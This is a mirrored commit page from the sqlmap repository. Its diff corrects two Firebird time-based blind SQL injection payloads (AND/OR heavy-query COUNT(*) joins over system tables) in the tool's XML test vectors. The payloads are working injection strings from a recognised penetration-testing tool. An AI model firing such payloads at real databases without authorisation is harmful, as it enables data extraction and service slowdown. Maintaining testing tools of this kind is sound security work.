mirror of
				https://github.com/sqlmapproject/sqlmap.git
				synced 2025-10-31 07:57:47 +03:00 
			
		
		
		
	minor bug fix related to Firebird time based test vectors
This commit is contained in:
		
							parent
							
								
									7690aa85ce
								
							
						
					
					
						commit
						23a86ed612
					
				|  | @ -1501,7 +1501,7 @@ Formats: | |||
|         <where>1</where> | ||||
|         <epayload></epayload> | ||||
|         <request> | ||||
|             <payload>AND (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload> | ||||
|             <payload>AND (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload> | ||||
|         </request> | ||||
|         <response> | ||||
|             <time>[SLEEPTIME]</time> | ||||
|  | @ -1589,7 +1589,7 @@ Formats: | |||
|         <where>1</where> | ||||
|         <epayload></epayload> | ||||
|         <request> | ||||
|             <payload>OR (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload> | ||||
|             <payload>OR (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload> | ||||
|         </request> | ||||
|         <response> | ||||
|             <time>[SLEEPTIME]</time> | ||||
|  |  | |||
		Loading…
	
		Reference in New Issue
	
	Block a user